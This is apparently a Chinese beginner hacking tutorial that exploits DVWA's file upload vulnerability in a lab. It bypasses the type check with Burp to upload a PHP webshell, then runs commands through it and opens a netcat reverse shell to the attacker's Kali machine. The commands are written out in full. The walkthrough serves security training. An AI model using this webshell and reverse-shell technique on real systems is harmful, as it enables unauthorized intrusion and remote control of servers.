黑客零基础第三章-Web漏洞利用第六节-文件上传漏洞分析利用

本节讲述了DVWA的文件上传漏洞,演示利用文件上传入侵靶机。

目录

1.场景

2.DVWA 文件上传漏洞简介

3.DVWA 文件上传漏洞利用

4.总结


1.场景


虚拟机:vmware

攻击主机:kali

IP:192.168.239.142

靶机:Windows10

IP:192.168.239.1

服务:xampp启动的DVWA


2.DVWA 文件上传漏洞简介

文件上传漏洞界面是一处图片上传,

这次我们使用medium安全级别(因为low级别的实在是太简单),代码如下,

代码审计后,发现只能上传格式为jpeg和png类型图片,且size不能大于10000。

3.DVWA 文件上传漏洞利用

准备一个一句话木马文件,后缀为.png。

 

 上传文件,并使用burp截获,

使用burp把文件shell.png改为shell.php,

上传成功,并且界面还显示了上传路径。

浏览器输入http://192.168.239.1/DVWA/hackable/uploads/shell.php?cmd=whoami测试上传的一句话木马。命令执行成功,显示了靶机主机名。

在kali上开启nc,浏览器执行URL

 http://192.168.239.1/DVWA/hackable/uploads/shell.php?cmd=nc64.exe -e cmd.exe 192.168.239.142 4444

获取靶机的shell。

 

4.总结

文件上传漏洞的利用需要注意的是,必须知道上传后的路径。如果上传一个木马后无法获得路径,那么也不可能触发从而进行利用。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值